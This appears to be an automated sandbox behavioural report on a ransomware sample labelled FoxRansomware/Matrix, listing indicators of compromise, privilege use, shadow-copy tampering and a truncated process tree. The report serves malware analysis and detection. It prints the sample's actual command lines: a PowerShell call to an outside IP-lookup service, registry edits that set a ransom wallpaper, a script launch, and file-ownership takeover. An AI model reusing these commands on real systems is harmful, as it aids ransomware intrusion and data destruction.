42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Links\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Music\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe -
Enumerates connected drives 3 TTPs 44 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exeotHboBGk64.exedescription ioc process File opened (read-only) \??\T: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\M: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\I: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\E: otHboBGk64.exe File opened (read-only) \??\O: otHboBGk64.exe File opened (read-only) \??\P: otHboBGk64.exe File opened (read-only) \??\Z: otHboBGk64.exe File opened (read-only) \??\W: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\Q: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\N: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\H: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\I: otHboBGk64.exe File opened (read-only) \??\J: otHboBGk64.exe File opened (read-only) \??\L: otHboBGk64.exe File opened (read-only) \??\S: otHboBGk64.exe File opened (read-only) \??\S: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\K: otHboBGk64.exe File opened (read-only) \??\M: otHboBGk64.exe File opened (read-only) \??\G: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\R: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\P: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\O: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\U: otHboBGk64.exe File opened (read-only) \??\Y: otHboBGk64.exe File opened (read-only) \??\Y: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\N: otHboBGk64.exe File opened (read-only) \??\T: otHboBGk64.exe File opened (read-only) \??\V: otHboBGk64.exe File opened (read-only) \??\W: otHboBGk64.exe File opened (read-only) \??\X: otHboBGk64.exe File opened (read-only) \??\X: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\V: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\U: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\E: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\G: otHboBGk64.exe File opened (read-only) \??\H: otHboBGk64.exe File opened (read-only) \??\Z: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\K: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\J: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\A: otHboBGk64.exe File opened (read-only) \??\B: otHboBGk64.exe File opened (read-only) \??\Q: otHboBGk64.exe File opened (read-only) \??\R: otHboBGk64.exe File opened (read-only) \??\L: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 151 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\sbJWIIVX.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
Processes:
42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exedescription ioc process File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_fr.properties 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_sv.properties 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaBrightItalic.ttf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\RevokeCopy.DVR-MS 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\vlc.mo 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.25\Microsoft.NETCore.App.deps.json 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\javaw.exe 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\splash_11-lic.gif 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\MLModels\autofill_labeling_features_email.txt.DATA 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\ca-Es-VALENCIA.pak 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\hi.pak 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\ga.pak.DATA 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\javacpl.cpl 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Mozilla Firefox\precomplete 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\common.js 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Mu\Social.DATA 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\nashorn.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\dom.md 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\gstreamer.md 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\gstreamer.md 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\fonts\LucidaBrightDemiBold.ttf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\lv.pak 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Mu\Content.DATA 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jstack.exe 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Mozilla Firefox\private_browsing.VisualElementsManifest.xml 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\cue.luac 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\vlc.mo 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\af.pak 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\sk.pak 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\tnameserv.exe 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\jopt-simple.md 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\cldr.md 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\vlc.mo 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\cli.luac 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\vlc.exe 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_ko.properties 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\jsse.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\classlist 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\cs.pak.DATA 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\bcel.md 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_proxy\identity_helper.Sparse.Internal.msix 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jfr.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\PrivateBrowsing_70.png 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\sr.pak 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\vk_swiftshader_icd.json.DATA 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\cldr.md 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\dom.md 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\webkit.md 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\jabswitch.exe 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\ja.pak.DATA 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmti.h 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\hijrah-config-umalqura.properties 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\blacklisted.certs 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_proxy\dev.identity_helper.exe.manifest 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\zh-TW.pak 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome.exe.sig 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Mozilla Firefox\private_browsing.exe 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk-1.8\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 5264 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exeotHboBGk64.exepid process 3900 powershell.exe 3900 powershell.exe 3900 powershell.exe 2532 otHboBGk64.exe 2532 otHboBGk64.exe 2532 otHboBGk64.exe 2532 otHboBGk64.exe 2532 otHboBGk64.exe 2532 otHboBGk64.exe 2532 otHboBGk64.exe 2532 otHboBGk64.exe 2532 otHboBGk64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
otHboBGk64.exepid process 2532 otHboBGk64.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exetakeown.exeotHboBGk64.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exevssvc.exetakeown.exeWMIC.exetakeown.exetakeown.exedescription pid process Token: SeDebugPrivilege 3900 powershell.exe Token: SeTakeOwnershipPrivilege 4660 takeown.exe Token: SeDebugPrivilege 2532 otHboBGk64.exe Token: SeLoadDriverPrivilege 2532 otHboBGk64.exe Token: SeTakeOwnershipPrivilege 4932 takeown.exe Token: SeTakeOwnershipPrivilege 5172 takeown.exe Token: SeTakeOwnershipPrivilege 5980 takeown.exe Token: SeTakeOwnershipPrivilege 5728 takeown.exe Token: SeTakeOwnershipPrivilege 1932 takeown.exe Token: SeTakeOwnershipPrivilege 4488 takeown.exe Token: SeTakeOwnershipPrivilege 5800 takeown.exe Token: SeTakeOwnershipPrivilege 5304 takeown.exe Token: SeTakeOwnershipPrivilege 2936 takeown.exe Token: SeTakeOwnershipPrivilege 5996 takeown.exe Token: SeTakeOwnershipPrivilege 5724 takeown.exe Token: SeTakeOwnershipPrivilege 2324 takeown.exe Token: SeBackupPrivilege 6092 vssvc.exe Token: SeRestorePrivilege 6092 vssvc.exe Token: SeAuditPrivilege 6092 vssvc.exe Token: SeTakeOwnershipPrivilege 2480 takeown.exe Token: SeIncreaseQuotaPrivilege 5988 WMIC.exe Token: SeSecurityPrivilege 5988 WMIC.exe Token: SeTakeOwnershipPrivilege 5988 WMIC.exe Token: SeLoadDriverPrivilege 5988 WMIC.exe Token: SeSystemProfilePrivilege 5988 WMIC.exe Token: SeSystemtimePrivilege 5988 WMIC.exe Token: SeProfSingleProcessPrivilege 5988 WMIC.exe Token: SeIncBasePriorityPrivilege 5988 WMIC.exe Token: SeCreatePagefilePrivilege 5988 WMIC.exe Token: SeBackupPrivilege 5988 WMIC.exe Token: SeRestorePrivilege 5988 WMIC.exe Token: SeShutdownPrivilege 5988 WMIC.exe Token: SeDebugPrivilege 5988 WMIC.exe Token: SeSystemEnvironmentPrivilege 5988 WMIC.exe Token: SeRemoteShutdownPrivilege 5988 WMIC.exe Token: SeUndockPrivilege 5988 WMIC.exe Token: SeManageVolumePrivilege 5988 WMIC.exe Token: 33 5988 WMIC.exe Token: 34 5988 WMIC.exe Token: 35 5988 WMIC.exe Token: 36 5988 WMIC.exe Token: SeTakeOwnershipPrivilege 5236 takeown.exe Token: SeIncreaseQuotaPrivilege 5988 WMIC.exe Token: SeSecurityPrivilege 5988 WMIC.exe Token: SeTakeOwnershipPrivilege 5988 WMIC.exe Token: SeLoadDriverPrivilege 5988 WMIC.exe Token: SeSystemProfilePrivilege 5988 WMIC.exe Token: SeSystemtimePrivilege 5988 WMIC.exe Token: SeProfSingleProcessPrivilege 5988 WMIC.exe Token: SeIncBasePriorityPrivilege 5988 WMIC.exe Token: SeCreatePagefilePrivilege 5988 WMIC.exe Token: SeBackupPrivilege 5988 WMIC.exe Token: SeRestorePrivilege 5988 WMIC.exe Token: SeShutdownPrivilege 5988 WMIC.exe Token: SeDebugPrivilege 5988 WMIC.exe Token: SeSystemEnvironmentPrivilege 5988 WMIC.exe Token: SeRemoteShutdownPrivilege 5988 WMIC.exe Token: SeUndockPrivilege 5988 WMIC.exe Token: SeManageVolumePrivilege 5988 WMIC.exe Token: 33 5988 WMIC.exe Token: 34 5988 WMIC.exe Token: 35 5988 WMIC.exe Token: 36 5988 WMIC.exe Token: SeTakeOwnershipPrivilege 5744 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.execmd.execmd.execmd.execmd.execmd.exeotHboBGk.execmd.execmd.exedescription pid process target process PID 2472 wrote to memory of 1520 2472 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2472 wrote to memory of 1520 2472 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2472 wrote to memory of 1520 2472 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2472 wrote to memory of 4080 2472 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe NWvak0Th.exe PID 2472 wrote to memory of 4080 2472 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe NWvak0Th.exe PID 2472 wrote to memory of 4080 2472 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe NWvak0Th.exe PID 2472 wrote to memory of 4040 2472 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2472 wrote to memory of 4040 2472 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2472 wrote to memory of 4040 2472 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 4040 wrote to memory of 3900 4040 cmd.exe powershell.exe PID 4040 wrote to memory of 3900 4040 cmd.exe powershell.exe PID 4040 wrote to memory of 3900 4040 cmd.exe powershell.exe PID 2472 wrote to memory of 2624 2472 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2472 wrote to memory of 2624 2472 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2472 wrote to memory of 2624 2472 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2472 wrote to memory of 2324 2472 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2472 wrote to memory of 2324 2472 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2472 wrote to memory of 2324 2472 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2624 wrote to memory of 3576 2624 cmd.exe reg.exe PID 2624 wrote to memory of 3576 2624 cmd.exe reg.exe PID 2624 wrote to memory of 3576 2624 cmd.exe reg.exe PID 2324 wrote to memory of 1280 2324 cmd.exe wscript.exe PID 2324 wrote to memory of 1280 2324 cmd.exe wscript.exe PID 2324 wrote to memory of 1280 2324 cmd.exe wscript.exe PID 2624 wrote to memory of 1900 2624 cmd.exe reg.exe PID 2624 wrote to memory of 1900 2624 cmd.exe reg.exe PID 2624 wrote to memory of 1900 2624 cmd.exe reg.exe PID 2624 wrote to memory of 4448 2624 cmd.exe reg.exe PID 2624 wrote to memory of 4448 2624 cmd.exe reg.exe PID 2624 wrote to memory of 4448 2624 cmd.exe reg.exe PID 2472 wrote to memory of 4432 2472 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2472 wrote to memory of 4432 2472 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2472 wrote to memory of 4432 2472 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 4432 wrote to memory of 2288 4432 cmd.exe cacls.exe PID 4432 wrote to memory of 2288 4432 cmd.exe cacls.exe PID 4432 wrote to memory of 2288 4432 cmd.exe cacls.exe PID 4432 wrote to memory of 4660 4432 cmd.exe takeown.exe PID 4432 wrote to memory of 4660 4432 cmd.exe takeown.exe PID 4432 wrote to memory of 4660 4432 cmd.exe takeown.exe PID 4432 wrote to memory of 4828 4432 cmd.exe cmd.exe PID 4432 wrote to memory of 4828 4432 cmd.exe cmd.exe PID 4432 wrote to memory of 4828 4432 cmd.exe cmd.exe PID 4828 wrote to memory of 4792 4828 cmd.exe otHboBGk.exe PID 4828 wrote to memory of 4792 4828 cmd.exe otHboBGk.exe PID 4828 wrote to memory of 4792 4828 cmd.exe otHboBGk.exe PID 4792 wrote to memory of 2532 4792 otHboBGk.exe otHboBGk64.exe PID 4792 wrote to memory of 2532 4792 otHboBGk.exe otHboBGk64.exe PID 2472 wrote to memory of 5348 2472 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2472 wrote to memory of 5348 2472 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2472 wrote to memory of 5348 2472 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 5348 wrote to memory of 5400 5348 cmd.exe cacls.exe PID 5348 wrote to memory of 5400 5348 cmd.exe cacls.exe PID 5348 wrote to memory of 5400 5348 cmd.exe cacls.exe PID 5348 wrote to memory of 5416 5348 cmd.exe takeown.exe PID 5348 wrote to memory of 5416 5348 cmd.exe takeown.exe PID 5348 wrote to memory of 5416 5348 cmd.exe takeown.exe PID 5348 wrote to memory of 5432 5348 cmd.exe cmd.exe PID 5348 wrote to memory of 5432 5348 cmd.exe cmd.exe PID 5348 wrote to memory of 5432 5348 cmd.exe cmd.exe PID 5432 wrote to memory of 5568 5432 cmd.exe otHboBGk.exe PID 5432 wrote to memory of 5568 5432 cmd.exe otHboBGk.exe PID 5432 wrote to memory of 5568 5432 cmd.exe otHboBGk.exe PID 5348 wrote to memory of 5956 5348 cmd.exe otHboBGk.exe PID 5348 wrote to memory of 5956 5348 cmd.exe otHboBGk.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe"1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWvak0Th.exe"2⤵PID:1520
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWvak0Th.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWvak0Th.exe" -n2⤵
- Executes dropped EXE
PID:4080
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\z5d5AVWX.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:4040 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3900
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\sbJWIIVX.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\sbJWIIVX.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:3576
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:1900
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:4448
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\B8oWcb3X.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\B8oWcb3X.vbs"3⤵
- Checks computer location settings
PID:1280 -
